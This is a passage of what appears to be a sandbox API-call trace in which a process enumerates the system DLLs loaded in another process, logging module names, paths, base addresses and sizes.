lpmodinfo=0x2422d60*(lpBaseOfDll=0x7fef92e0000, SizeOfImage=0xbd000, EntryPoint=0x7fef92e1ea4)) returned 1 [0075.682] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.682] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef92e0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="PortableDeviceApi.dll") returned 0x15 [0075.685] CoTaskMemFree (pv=0xd910e0) [0075.685] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.685] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef92e0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll")) returned 0x29 [0075.688] CoTaskMemFree (pv=0xd910e0) [0075.688] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9280000, lpmodinfo=0x2424f50, cb=0x18 | out: lpmodinfo=0x2424f50*(lpBaseOfDll=0x7fef9280000, SizeOfImage=0x17000, EntryPoint=0x7fef928d308)) returned 1 [0075.692] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.692] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9280000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="portabledeviceconnectapi.dll") returned 0x1c [0075.695] CoTaskMemFree (pv=0xd910e0) [0075.695] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.695] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9280000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\portabledeviceconnectapi.dll" (normalized: "c:\\windows\\system32\\portabledeviceconnectapi.dll")) returned 0x30 [0075.698] CoTaskMemFree (pv=0xd910e0) [0075.698] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd830000, lpmodinfo=0x2427160, cb=0x18 | out: lpmodinfo=0x2427160*(lpBaseOfDll=0x7fefd830000, SizeOfImage=0x3b000, EntryPoint=0x7fefd831324)) returned 1 [0075.702] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.702] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WINTRUST.dll") returned 0xc [0075.705] CoTaskMemFree (pv=0xd910e0) [0075.705] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.705] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINTRUST.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")) returned 0x20 [0075.708] CoTaskMemFree (pv=0xd910e0) [0075.709] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd9e0000, lpmodinfo=0x2429330, cb=0x18 | out: lpmodinfo=0x2429330*(lpBaseOfDll=0x7fefd9e0000, SizeOfImage=0x16d000, EntryPoint=0x7fefd9e10b4)) returned 1 [0075.712] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.712] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd9e0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0075.715] CoTaskMemFree (pv=0xd910e0) [0075.715] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.715] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd9e0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPT32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0075.719] CoTaskMemFree (pv=0xd910e0) [0075.719] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd820000, lpmodinfo=0x242b4f0, cb=0x18 | out: lpmodinfo=0x242b4f0*(lpBaseOfDll=0x7fefd820000, SizeOfImage=0xf000, EntryPoint=0x7fefd821020)) returned 1 [0075.722] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.722] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd820000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0075.726] CoTaskMemFree (pv=0xd910e0) [0075.726] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.726] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd820000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSASN1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")) returned 0x1e [0075.730] CoTaskMemFree (pv=0xd910e0) [0075.730] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9270000, lpmodinfo=0x242d6b0, cb=0x18 | out: lpmodinfo=0x242d6b0*(lpBaseOfDll=0x7fef9270000, SizeOfImage=0xc000, EntryPoint=0x7fef927419c)) returned 1 [0075.734] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.734] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9270000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="APPHLPDM.DLL") returned 0xc [0075.737] CoTaskMemFree (pv=0xd910e0) [0075.737] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.737] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9270000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\APPHLPDM.DLL" (normalized: "c:\\windows\\system32\\apphlpdm.dll")) returned 0x20 [0075.741] CoTaskMemFree (pv=0xd910e0) [0075.741] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef93a0000, lpmodinfo=0x242f880, cb=0x18 | out: lpmodinfo=0x242f880*(lpBaseOfDll=0x7fef93a0000, SizeOfImage=0x7c000, EntryPoint=0x7fef93a11d4)) returned 1 [0075.745] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.745] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef93a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wer.dll") returned 0x7 [0075.748] CoTaskMemFree (pv=0xd910e0) [0075.748] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.748] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef93a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll")) returned 0x1b [0075.752] CoTaskMemFree (pv=0xd910e0) [0075.752] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef66b0000, lpmodinfo=0x2431a48, cb=0x18 | out: lpmodinfo=0x2431a48*(lpBaseOfDll=0x7fef66b0000, SizeOfImage=0x5c000, EntryPoint=0x7fef66b8c20)) returned 1 [0075.756] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.756] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef66b0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="netman.dll") returned 0xa [0075.759] CoTaskMemFree (pv=0xd910e0) [0075.759] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.760] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef66b0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\netman.dll" (normalized: "c:\\windows\\system32\\netman.dll")) returned 0x1e [0075.763] CoTaskMemFree (pv=0xd910e0) [0075.763] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9c0000, lpmodinfo=0x2434020, cb=0x18 | out: lpmodinfo=0x2434020*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0075.767] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.767] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0075.771] CoTaskMemFree (pv=0xd910e0) [0075.771] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.771] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0075.774] CoTaskMemFree (pv=0xd910e0) [0075.774] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb260000, lpmodinfo=0x24361d0, cb=0x18 | out: lpmodinfo=0x24361d0*(lpBaseOfDll=0x7fefb260000, SizeOfImage=0xb000, EntryPoint=0x7fefb261198)) returned 1 [0075.778] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.778] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb260000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0075.782] CoTaskMemFree (pv=0xd910e0) [0075.782] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.782] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb260000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\WINNSI.DLL" (normalized: "c:\\windows\\system32\\winnsi.dll")) returned 0x1e [0075.786] CoTaskMemFree (pv=0xd910e0) [0075.786] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6950000, lpmodinfo=0x2438390, cb=0x18 | out: lpmodinfo=0x2438390*(lpBaseOfDll=0x7fef6950000, SizeOfImage=0x28b000, EntryPoint=0x7fef6956f5c)) returned 1 [0075.790] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.790] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6950000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="netshell.dll") returned 0xc [0075.793] CoTaskMemFree (pv=0xd910e0) [0075.794] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.794] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6950000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll")) returned 0x20 [0075.797] CoTaskMemFree (pv=0xd910e0) [0075.797] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb270000, lpmodinfo=0x243a560, cb=0x18 | out: lpmodinfo=0x243a560*(lpBaseOfDll=0x7fefb270000, SizeOfImage=0x27000, EntryPoint=0x7fefb2798bc)) returned 1 [0075.801] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.801] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb270000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0075.806] CoTaskMemFree (pv=0xd910e0) [0075.806] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.806] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb270000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")) returned 0x20 [0075.810] CoTaskMemFree (pv=0xd910e0) [0075.810] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb3f0000, lpmodinfo=0x243c730, cb=0x18 | out: lpmodinfo=0x243c730*(lpBaseOfDll=0x7fefb3f0000, SizeOfImage=0x15000, EntryPoint=0x7fefb3f60d8)) returned 1 [0075.814] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.814] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb3f0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="nlaapi.dll") returned 0xa [0075.818] CoTaskMemFree (pv=0xd910e0) [0075.818] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.818] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb3f0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")) returned 0x1e [0075.822] CoTaskMemFree (pv=0xd910e0) [0075.822] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef65d0000, lpmodinfo=0x243e8f0, cb=0x18 | out: lpmodinfo=0x243e8f0*(lpBaseOfDll=0x7fef65d0000, SizeOfImage=0xd8000, EntryPoint=0x7fef6638bd0)) returned 1 [0075.826] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.826] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef65d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="RASDLG.dll") returned 0xa [0075.830] CoTaskMemFree (pv=0xd910e0) [0075.830] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.830] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef65d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\RASDLG.dll" (normalized: "c:\\windows\\system32\\rasdlg.dll")) returned 0x1e [0075.834] CoTaskMemFree (pv=0xd910e0) [0075.834] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6590000, lpmodinfo=0x2440ab0, cb=0x18 | out: lpmodinfo=0x2440ab0*(lpBaseOfDll=0x7fef6590000, SizeOfImage=0x3a000, EntryPoint=0x7fef6591010)) returned 1 [0075.838] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.838] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6590000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MPRAPI.dll") returned 0xa [0075.842] CoTaskMemFree (pv=0xd910e0) [0075.842] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.842] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6590000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\MPRAPI.dll" (normalized: "c:\\windows\\system32\\mprapi.dll")) returned 0x1e [0075.846] CoTaskMemFree (pv=0xd910e0) [0075.846] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6520000, lpmodinfo=0x2442c70, cb=0x18 | out: lpmodinfo=0x2442c70*(lpBaseOfDll=0x7fef6520000, SizeOfImage=0x62000, EntryPoint=0x7fef6521198)) returned 1 [0075.850] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.850] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6520000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="RASAPI32.dll") returned 0xc [0075.854] CoTaskMemFree (pv=0xd910e0) [0075.854] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.854] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6520000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\RASAPI32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll")) returned 0x20 [0075.858] CoTaskMemFree (pv=0xd910e0) [0075.858] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6500000, lpmodinfo=0x2444e40, cb=0x18 | out: lpmodinfo=0x2444e40*(lpBaseOfDll=0x7fef6500000, SizeOfImage=0x1c000, EntryPoint=0x7fef65011a0)) returned 1 [0075.862] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.862] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6500000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="rasman.dll") returned 0xa [0075.867] CoTaskMemFree (pv=0xd910e0) [0075.867] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.867] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6500000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll")) returned 0x1e [0075.871] CoTaskMemFree (pv=0xd910e0) [0075.871] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff970000, lpmodinfo=0x2447000, cb=0x18 | out: lpmodinfo=0x2447000*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0075.875] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.875] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff970000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0075.879] CoTaskMemFree (pv=0xd910e0) [0075.879] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.879] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff970000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0075.883] CoTaskMemFree (pv=0xd910e0) [0075.883] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb830000, lpmodinfo=0x24491c0, cb=0x18 | out: lpmodinfo=0x24491c0*(lpBaseOfDll=0x7fefb830000, SizeOfImage=0x11000, EntryPoint=0x7fefb8314c0)) returned 1 [0075.887] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.887] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="rtutils.dll") returned 0xb [0075.891] CoTaskMemFree (pv=0xd910e0) [0075.891] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.891] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")) returned 0x1f [0075.895] CoTaskMemFree (pv=0xd910e0) [0075.895] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb330000, lpmodinfo=0x244b380, cb=0x18 | out: lpmodinfo=0x244b380*(lpBaseOfDll=0x7fefb330000, SizeOfImage=0xc000, EntryPoint=0x7fefb3315d8)) returned 1 [0075.900] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.900] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb330000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="dsrole.dll") returned 0xa [0075.904] CoTaskMemFree (pv=0xd910e0) [0075.904] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.904] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb330000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")) returned 0x1e [0075.908] CoTaskMemFree (pv=0xd910e0) [0075.908] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9a80000, lpmodinfo=0x244d540, cb=0x18 | out: lpmodinfo=0x244d540*(lpBaseOfDll=0x7fef9a80000, SizeOfImage=0x84000, EntryPoint=0x7fef9ad1118)) returned 1 [0075.913] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.913] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9a80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="netcfgx.dll") returned 0xb [0075.917] CoTaskMemFree (pv=0xd910e0) [0075.917] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.917] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9a80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll")) returned 0x1f [0075.921] CoTaskMemFree (pv=0xd910e0) [0075.921] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcb40000, lpmodinfo=0x244f700, cb=0x18 | out: lpmodinfo=0x244f700*(lpBaseOfDll=0x7fefcb40000, SizeOfImage=0x12000, EntryPoint=0x7fefcb41060)) returned 1 [0075.926] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.926] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcb40000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="devrtl.DLL") returned 0xa [0075.930] CoTaskMemFree (pv=0xd910e0) [0075.930] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.930] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcb40000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\devrtl.DLL" (normalized: "c:\\windows\\system32\\devrtl.dll")) returned 0x1e [0075.934] CoTaskMemFree (pv=0xd910e0) [0075.934] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9830000, lpmodinfo=0x24518c0, cb=0x18 | out: lpmodinfo=0x24518c0*(lpBaseOfDll=0x7fef9830000, SizeOfImage=0x6b000, EntryPoint=0x7fef9874344)) returned 1 [0075.939] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.939] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="hnetcfg.dll") returned 0xb [0075.943] CoTaskMemFree (pv=0xd910e0) [0075.943] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.943] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll")) returned 0x1f [0075.950] CoTaskMemFree (pv=0xd910e0) [0075.950] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb350000, lpmodinfo=0x2453a98, cb=0x18 | out: lpmodinfo=0x2453a98*(lpBaseOfDll=0x7fefb350000, SizeOfImage=0x19000, EntryPoint=0x7fefb3511a8)) returned 1 [0075.955] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.955] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb350000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ATL.DLL") returned 0x7 [0075.960] CoTaskMemFree (pv=0xd910e0) [0075.960] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.960] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb350000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ATL.DLL" (normalized: "c:\\windows\\system32\\atl.dll")) returned 0x1b [0075.964] CoTaskMemFree (pv=0xd910e0) [0075.964] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb320000, lpmodinfo=0x2455c48, cb=0x18 | out: lpmodinfo=0x2455c48*(lpBaseOfDll=0x7fefb320000, SizeOfImage=0xb000, EntryPoint=0x7fefb324f8c)) returned 1 [0075.969] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.969] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb320000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="slc.dll") returned 0x7 [0075.974] CoTaskMemFree (pv=0xd910e0) [0075.974] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.974] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb320000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")) returned 0x1b [0075.981] CoTaskMemFree (pv=0xd910e0) [0075.981] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9b80000, lpmodinfo=0x2457df8, cb=0x18 | out: lpmodinfo=0x2457df8*(lpBaseOfDll=0x7fef9b80000, SizeOfImage=0xe000, EntryPoint=0x7fef9b85500)) returned 1 [0075.988] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.988] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9b80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wbemprox.dll") returned 0xc [0075.995] CoTaskMemFree (pv=0xd910e0) [0075.995] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0075.995] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9b80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")) returned 0x25 [0076.003] CoTaskMemFree (pv=0xd910e0) [0076.003] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9e20000, lpmodinfo=0x2459fd0, cb=0x18 | out: lpmodinfo=0x2459fd0*(lpBaseOfDll=0x7fef9e20000, SizeOfImage=0x77000, EntryPoint=0x7fef9e5e7f0)) returned 1 [0076.010] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0076.010] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9e20000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wbemcomn2.DLL") returned 0xd [0076.017] CoTaskMemFree (pv=0xd910e0) [0076.017] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0076.017] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9e20000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbemcomn2.DLL" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")) returned 0x21 [0076.024] CoTaskMemFree (pv=0xd910e0) [0076.024] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd1e0000, lpmodinfo=0x245c1a0, cb=0x18 | out: lpmodinfo=0x245c1a0*(lpBaseOfDll=0x7fefd1e0000, SizeOfImage=0x22000, EntryPoint=0x7fefd1e5d30)) returned 1 [0076.031] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0076.032] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd1e0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0076.039] CoTaskMemFree (pv=0xd910e0) [0076.039] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0076.040] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd1e0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0076.047] CoTaskMemFree (pv=0xd910e0) [0076.047] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef98a0000, lpmodinfo=0x245e360, cb=0x18 | out: lpmodinfo=0x245e360*(lpBaseOfDll=0x7fef98a0000, SizeOfImage=0x13000, EntryPoint=0x7fef98a1d80)) returned 1 [0076.054] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0076.054] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef98a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wbemsvc.dll") returned 0xb [0076.062] CoTaskMemFree (pv=0xd910e0) [0076.062] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0076.062] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef98a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")) returned 0x24 [0076.081] CoTaskMemFree (pv=0xd910e0) [0076.082] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9bc0000, lpmodinfo=0x2460530, cb=0x18 | out: lpmodinfo=0x2460530*(lpBaseOfDll=0x7fef9bc0000, SizeOfImage=0xd3000, EntryPoint=0x7fef9c38b00)) returned 1 [0076.089] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0076.089] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9bc0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="fastprox.dll") returned 0xc [0076.095] CoTaskMemFree (pv=0xd910e0) [0076.095] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0076.095] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9bc0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")) returned 0x25 [0076.102] CoTaskMemFree (pv=0xd910e0) [0076.102] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9b90000, lpmodinfo=0x2462708, cb=0x18 | out: lpmodinfo=0x2462708*(lpBaseOfDll=0x7fef9b90000, SizeOfImage=0x27000, EntryPoint=0x7fef9b911a0)) returned 1 [0076.107] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0076.107] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9b90000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="NTDSAPI.dll") returned 0xb [0076.113] CoTaskMemFree (pv=0xd910e0) [0076.113] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0076.113] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9b90000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NTDSAPI.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")) returned 0x1f [0076.119] CoTaskMemFree (pv=0xd910e0) [0076.119] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef64c0000, lpmodinfo=0x24648c8, cb=0x18 | out: lpmodinfo=0x24648c8*(lpBaseOfDll=0x7fef64c0000, SizeOfImage=0x3f000, EntryPoint=0x7fef64c12c0)) returned 1 [0076.125] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0076.125] GetModuleBaseNameW (in: hProcess=0x218, 